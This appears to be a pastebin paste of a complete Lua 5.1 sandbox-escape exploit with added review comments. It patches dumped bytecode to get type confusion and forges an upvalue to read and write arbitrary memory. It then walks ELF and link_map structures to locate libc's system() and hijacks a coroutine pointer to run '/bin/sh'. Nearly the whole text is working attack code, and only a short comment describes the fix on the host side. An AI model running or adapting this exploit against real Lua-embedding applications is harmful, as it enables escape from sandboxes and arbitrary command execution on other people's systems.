
Untitled

a guest
Feb 14th, 2020
  1. {
-- asnum(v): return the raw 8 value bytes of any Lua value `v` reinterpreted
-- as a double.  For collectable values (strings, functions, threads, ...)
-- those bytes are the object's pointer, which is how the rest of this file
-- leaks addresses; for a number it is just the number itself.
--
-- How it works: `load` is handed a reader function that, on its first call,
-- returns the string.dump of a tiny for-loop and, on the second call, nil
-- (end of chunk).  Before being returned the dump is byte-patched: every
-- instruction word \96\0\0\128 is replaced by \22\0\0\128.  Only the low
-- bits of the word change: the 6-bit opcode goes 32 -> 22 (and the A field
-- 1 -> 0); in Lua 5.1's lopcodes.h numbering that is FORPREP -> JMP --
-- verify against the host's version.  FORPREP is the instruction that
-- type-checks the loop's init/limit/step; with it turned into a plain jump,
-- FORLOOP adds step 0 to whatever bytes `x` holds and `return i` hands them
-- back as a number.  (gsub's second return value, the match count, is
-- dropped by `load`, which takes one value from the reader.)
--
-- NOTE(review): this only works because the host's `load` accepts binary
-- chunks (string.dump output) and does not validate them, which Lua 5.1 does
-- not.  A sandbox that exposes load/loadstring together with string.dump,
-- or accepts attacker-supplied bytecode strings, is escapable this way.  The
-- hosting-side fix is to refuse precompiled chunks outright: on 5.2+ pass
-- mode "t" to load(); on 5.1 wrap load/loadstring to reject any chunk whose
-- first byte is "\27", and do not expose string.dump.  A 64-bit,
-- little-endian build is assumed by everything below.
asnum = load(function()
  if not asnum_bool then
    -- first reader call: hand back the patched bytecode
    asnum_bool = true
    return string.dump(function(x)
      -- init == limit and step 0: FORLOOP's continue test passes once and
      -- the body returns the (no longer type-checked) loop value
      for i = x, x, 0 do
        return i
      end
    end):gsub("\96%z%z\128", "\22\0\0\128")
  else
    -- second reader call: signal end of chunk (and reset for a rerun)
    asnum_bool = false
    return nil
  end
end)
  15.  
  16. function double_to_dwords(x)
  17. if x == 0 then return 0, 0 end
  18. if x < 0 then x = -x end
  19.  
  20. local m, e = math.frexp(x)
  21.  
  22. if e + 1023 <= 1 then
  23. m = m * 2^(e + 1074)
  24. e = 0
  25. else
  26. m = (m - 0.5) * 2^53
  27. e = e + 1022
  28. end
  29.  
  30. local lo = m % 2^32
  31. m = (m - lo) / 2^32
  32. local hi = m + e * 2^20
  33.  
  34. return lo, hi
  35. end
  36.  
  37. function dwords_to_double(lo, hi)
  38. local m = hi % 2^20
  39. local e = (hi - m) / 2^20
  40. m = m * 2^32 + lo
  41.  
  42. if e ~= 0 then
  43. m = m + 2^52
  44. else
  45. e = 1
  46. end
  47. return m * 2^(e-1075)
  48. end
  49.  
  50. function dword_to_string(x)
  51. local b0 = x % 256; x = (x - b0) / 256
  52. local b1 = x % 256; x = (x - b1) / 256
  53. local b2 = x % 256; x = (x - b2) / 256
  54. local b3 = x % 256
  55.  
  56. return string.char(b0, b1, b2, b3)
  57. end
  58.  
  59. function qword_to_string(x)
  60. local lo, hi = double_to_dwords(x)
  61. return dword_to_string(lo) .. dword_to_string(hi)
  62. end
  63.  
  64. function add_dword_to_double(x, n)
  65. local lo, hi = double_to_dwords(x)
  66. return dwords_to_double(lo + n, hi)
  67. end
  68.  
-- Publish the helpers as raw globals.  They were defined with plain
-- `function name()` above; rawset bypasses any __newindex/__index
-- metamethods a sandbox may have put on _G, so the loaded chunk below can
-- still reach them by name.  (presumably the reason -- the host environment
-- is not shown in this file)
rawset(_G, "add_dword_to_double", add_dword_to_double)
rawset(_G, "asnum", asnum)
rawset(_G, "double_to_dwords", double_to_dwords)
rawset(_G, "dwords_to_double", dwords_to_double)
rawset(_G, "dword_to_string", dword_to_string)
rawset(_G, "qword_to_string", qword_to_string)

-- stop garbage collecting
-- NOTE(review): the code below forges objects out of plain strings and
-- aliases a stack slot through an upvalue; presumably none of that would
-- survive a collection cycle, hence the collector is frozen here.  It is
-- never restarted.
collectgarbage "stop"
  78.  
-- f: the escape proper.  `load` is given a reader that returns, once, the
-- string.dump of the anonymous function below with one instruction patched
-- (the gsub on its last line), then nil.  Running the result turns `asnum`
-- into an arbitrary read / arbitrary write, walks the interpreter's ELF and
-- loader structures to find libc's system(), and calls it.
f = load(function()
  if not f_bool then
    f_bool = true
    return string.dump(function()
      -- NOTE(review): the gsub at the end patches the FIRST match of
      -- \100\0\0\0 in this dump.  0x64 decodes as opcode 36 with A=1, i.e.
      -- the CLOSURE that builds `middle` into register 1 (Lua 5.1 numbering
      -- -- verify against lopcodes.h), and the 4 bytes after it -- the
      -- pseudo-instruction telling the VM which register the upvalue `magic`
      -- is captured from -- become \0\0\0\1, a MOVE (opcode 0) with A=0 and
      -- B=2.  As far as the rest of the code shows, the effect is that
      -- `magic` stops aliasing the local below and instead aliases a slot of
      -- this frame's stack, which put_into_magic then exploits.  The dump
      -- header that precedes the code stores this function's line numbers
      -- as 4-byte ints, so if this `function()` line ever lands on exactly
      -- line 100 of the file the patch hits the header instead of the code.
      -- Mind that when inserting lines above this point.
      local magic = nil
      local function middle()
        -- Everything used below is cached in locals first.  After the first
        -- put_into_magic call the closure's globals and constant table are
        -- presumably no longer reachable (the numeric locals n1..n32 and the
        -- string locals standing in for literals suggest exactly that), so
        -- nothing may be looked up by name past that point.
        local print = print   -- unused
        local asnum = asnum
        local double_to_dwords = double_to_dwords
        local add_dword_to_double = add_dword_to_double
        local dwords_to_double = dwords_to_double
        local qword_to_string = qword_to_string
        -- throwaway coroutine: its wrapper is a C closure whose function
        -- pointer (at +32, see n32) is first read to locate the interpreter
        -- image and at the end overwritten with system()
        local co = coroutine.wrap(function() end)
        local substr = string.sub
        local find = string.find
        local upval

        -- get the address of current "lua_State"
        -- asnum of the running thread is the lua_State pointer; luastate2 is
        -- its second 8-byte word.  Both words are overwritten with command
        -- text below and restored afterwards.
        local luastate1 = asnum(coroutine.running())
        local luastate2 = add_dword_to_double(luastate1, 8)

        -- some constants (n4, n6 and n7 are unused)
        local n1 = 1
        local n2 = 2
        local n4 = 4
        local n6 = 6
        local n7 = 7
        local n8 = 8
        local n16 = 16
        local n24 = 24
        local n32 = 32

        -- Distance from luaB_auxwrap (the C function behind coroutine.wrap,
        -- read out of `co` below) back to the interpreter's ELF base.
        -- NOTE(review): build-specific -- measured on one particular
        -- interpreter binary.  On any other build `base` is wrong and the
        -- program-header scan below reads unrelated memory.
        local pht_offset_from_auxwrap = 0x23a23
        local h38 = 0x38 -- program header entry size

        -- ELF constants: program-header type and dynamic-section tags
        local PT_DYNAMIC = 2
        local DT_NULL = 0
        local DT_STRRAB = 5   -- sic: DT_STRTAB
        local DT_SYMTAB = 6
        local DT_DEBUG = 21

        -- string literals, cached for the same reason as the numbers above
        local libc = "libc.so."        -- used as a Lua pattern below: the dots are wildcards
        local system = "__libc_system" -- glibc's alias of system(); see the symbol scan
        local null = "\0"              -- C-string terminator, located with find()
        local empty = ""

        -- declare some variables
        local luastate1_bkp
        local luastate2_bkp

        local lo, hi
        local base
        local ptheader
        local dynamic
        local symbol      -- unused

        local libc_base
        local libc_system
        local libc_strtab
        local libc_symtab
        local debug

        local s, e, tmp, n
        local str = empty
        local link_map
        local libc_dynamic

        -- Commands as raw 16-byte blobs: each pair of doubles carries the bit
        -- pattern of 16 little-endian bytes, NUL-terminated.  16 bytes is the
        -- hard limit: only the first two words of the lua_State are saved and
        -- restored below, so a longer command would need more backup slots.
        local commands = {
          dwords_to_double(0x7273752f, 0x6e69622f), dwords_to_double(0x7365722f, 0x00007465), -- "/usr/bin/reset"
          dwords_to_double(0x6e69622f, 0x0068732f), dwords_to_double(0x00000000, 0x00000000) } -- "/bin/sh"

        -- Point `magic` at address n.  After this returns, `asnum(magic)`
        -- reads the 8 bytes at n and `magic = v` writes v's 8 bytes there
        -- (NOTE(review): a Lua value store presumably also writes its type
        -- tag right after those bytes, which would be why the two command
        -- words below are written low address first -- verify).
        local function put_into_magic(n)
          -- hand-craft an UpVal: 16 bytes of filler where the object header
          -- would be, then the 8-byte value pointer n
          upval = "nextnexttmpaddpa" .. qword_to_string(n)

          -- get the pointer to our hand-crafted UpVal: the address of the
          -- string's bytes (24 is taken to be the TString header size on this
          -- build)
          local upval_ptr = qword_to_string(add_dword_to_double(asnum(upval), 24))

          -- three copies of that pointer, 24 bytes in all -- presumably laid
          -- out so that whatever structure the VM reads back through the
          -- redirected `magic` slot finds upval_ptr in every field it
          -- consults, and follows it to the fake UpVal and on to n
          magic = upval_ptr .. upval_ptr .. upval_ptr
        end

        -- put luaB_auxwrap's address into "magic"
        -- (the C function pointer stored at co + 32)
        put_into_magic(add_dword_to_double(asnum(co), n32))

        -- get offset to Program Header Table (ELF Header + 32)
        -- auxwrap minus the hard-coded offset is the ELF base; e_phoff lives
        -- at base + 32
        lo, hi = double_to_dwords(asnum(magic))
        base = dwords_to_double(lo - pht_offset_from_auxwrap, hi)
        put_into_magic(add_dword_to_double(base, n32))

        -- get real address of Program Header Table
        lo, hi = double_to_dwords(asnum(magic))
        ptheader = add_dword_to_double(base, lo)

        -- get the _DYNAMIC section's address: scan the program headers (0x38
        -- bytes each, p_type in the first dword) for PT_DYNAMIC.
        -- NOTE(review): unbounded -- e_phnum is never read, so a binary with
        -- no PT_DYNAMIC (static build) or a wrong `base` walks off the table
        -- and keeps reading until something faults.
        while true do
          put_into_magic(ptheader)
          lo, hi = double_to_dwords(asnum(magic))
          if lo == PT_DYNAMIC then
            -- p_vaddr : elf64_phdr+16
            put_into_magic(add_dword_to_double(ptheader, n16))
            dynamic = asnum(magic)
            break
          else
            ptheader = add_dword_to_double(ptheader, h38)
          end
        end

        -- relocate p_vaddr by the load base.  Plain `+` on two asnum values
        -- is exact here because both bit patterns have a zero exponent field
        -- (any address below 2^52 decodes as m * 2^-1074, see
        -- dwords_to_double), so the doubles add like integers.
        dynamic = dynamic + base

        -- get DT_DEBUG: walk the dynamic section (16-byte entries, d_tag in
        -- the first dword, d_val/d_ptr at +8).  DT_DEBUG's pointer is the
        -- loader's r_debug.  NOTE(review): also unbounded -- no DT_NULL check
        -- here, unlike the libc scan further down.
        while true do
          put_into_magic(dynamic)
          lo, hi = double_to_dwords(asnum(magic))

          if lo == DT_DEBUG then
            put_into_magic(add_dword_to_double(dynamic, n8))
            debug = asnum(magic)
            break
          else
            dynamic = add_dword_to_double(dynamic, n16)
          end
        end

        -- get the pointer to the link_map structure (r_debug + 8 = r_map)
        put_into_magic(add_dword_to_double(debug, n8))
        link_map = asnum(magic)

        -- iterate link_map until libc is found.  Offsets used: +0 l_addr,
        -- +8 l_name, +16 l_ld, +24 l_next.  NOTE(review): a NULL l_next is
        -- not checked either; if no entry matches, the next round reads
        -- address 8.
        while true do

          put_into_magic(add_dword_to_double(link_map, n8))
          n = asnum(magic)

          -- we can read only 8 bytes at once, so we have to loop: copy the
          -- C string at n into `str` up to its NUL.
          -- NOTE(review): `str` is never cleared between link_map entries
          -- (only the symbol loop below resets it), so it accumulates every
          -- library name seen so far.  Harmless for the search -- a match can
          -- only appear once libc's own name has been appended -- but
          -- probably not intended.
          while true do
            put_into_magic(n)
            tmp = qword_to_string(asnum(magic))

            -- "\0" contains no magic characters, so find() takes its plain
            -- substring path here (presumably relied upon: as a pattern an
            -- embedded NUL does not work in 5.1 -- verify on the host)
            s, e = find(tmp, null)
            if s then
              str = str .. substr(tmp, n1, s - n1)
              break
            else
              str = str .. tmp
              n = add_dword_to_double(n, n8)
            end
          end

          -- have we found libc?  (`libc` is a pattern: "libc.so." also
          -- matches e.g. "libcXsoY"; a plain find would be stricter)
          s, e = find(str, libc)
          if s then
            -- l_addr: libc's load base
            put_into_magic(link_map)
            libc_base = asnum(magic)

            -- get _DYNAMIC section for LibC (l_ld)
            put_into_magic(add_dword_to_double(link_map, n16))
            libc_dynamic = asnum(magic)

            -- get DT_STRTAB and DT_SYMTAB from LibC; this scan does stop at
            -- DT_NULL.  Both values are used as absolute addresses (not
            -- relocated by libc_base), so this relies on the loader having
            -- adjusted them in place -- glibc does; verify for other loaders.
            while true do
              put_into_magic(libc_dynamic)
              lo, hi = double_to_dwords(asnum(magic))
              put_into_magic(add_dword_to_double(libc_dynamic, n8))

              if lo == DT_NULL then
                break
              elseif lo == DT_STRRAB then
                libc_strtab = asnum(magic)
              elseif lo == DT_SYMTAB then
                libc_symtab = asnum(magic)
              end

              libc_dynamic = add_dword_to_double(libc_dynamic, n16)
            end

            break
          else
            -- l_next
            put_into_magic(add_dword_to_double(link_map, n24))
            link_map = asnum(magic)
          end
        end

        -- iterate LibC's symbol table until system (actually __libc_system) is
        -- found.  Entries are 24 bytes: st_name (dword) at +0, st_value at +8.
        -- NOTE(review): no end-of-table check and no fallback name; on a libc
        -- that does not export `__libc_system` (non-glibc, or a future glibc)
        -- this walks past the table.  Only the low dword of st_value is used,
        -- which is fine while the symbol's offset into libc stays under 4 GiB.
        while true do
          put_into_magic(libc_symtab)
          lo, hi = double_to_dwords(asnum(magic))

          -- we can read only 8 bytes at once, so we have to loop
          -- (same C-string copy as above, this time into a fresh `str`)
          n = add_dword_to_double(libc_strtab, lo)
          str = empty
          while true do
            put_into_magic(n)
            tmp = qword_to_string(asnum(magic))

            s, e = find(tmp, null)
            if s then
              str = str .. substr(tmp, n1, s - n1)
              break
            else
              str = str .. tmp
              n = add_dword_to_double(n, n8)
            end
          end

          if str and str == system then   -- `str and` is redundant: str is always a string here
            -- get __libc_system's real address
            put_into_magic(add_dword_to_double(libc_symtab, n8))
            lo, hi = double_to_dwords(asnum(magic))
            libc_system = add_dword_to_double(libc_base, lo)
            break
          else
            libc_symtab = add_dword_to_double(libc_symtab, n24)
          end
        end

        -- replace co's function pointer to __libc_system's real address:
        -- from here on, calling co() calls system() with the lua_State
        -- pointer as its argument.  NOTE(review): this pointer is never
        -- restored (only the state header words below are).
        put_into_magic(add_dword_to_double(asnum(co), n32))
        magic = libc_system

        -- save the current lua_State (its first two 8-byte words)
        put_into_magic(luastate1)
        luastate1_bkp = asnum(magic)
        put_into_magic(luastate2)
        luastate2_bkp = asnum(magic)

        -- execute commands in 16 byte chunks: write the command text over
        -- the first 16 bytes of the lua_State, then co() == system(L) sees
        -- them as the command string.  /usr/bin/reset runs first, /bin/sh
        -- second.
        for i=n1,#commands,n2 do
          put_into_magic(luastate1)
          magic = commands[i]
          put_into_magic(luastate2)
          magic = commands[i + n1]
          co()
        end

        -- restore the original lua_State
        put_into_magic(luastate1)
        magic = luastate1_bkp
        put_into_magic(luastate2)
        magic = luastate2_bkp

      end
      middle()
    end):gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1)  -- patch the first CLOSURE's capture pseudo-instruction, once (see note at the top of the dumped function)
  else
    -- second reader call: end of chunk
    f_bool = false
    return nil
  end
end)
-- Run the loaded chunk inside a fresh coroutine rather than on the main
-- thread: `middle` starts with asnum(coroutine.running()), and in Lua 5.1
-- coroutine.running() returns nil on the main thread, so the state whose
-- header gets overwritten has to be a coroutine's (5.1 behaviour -- verify
-- for the host's version).
coroutine.wrap(f)()
  329. }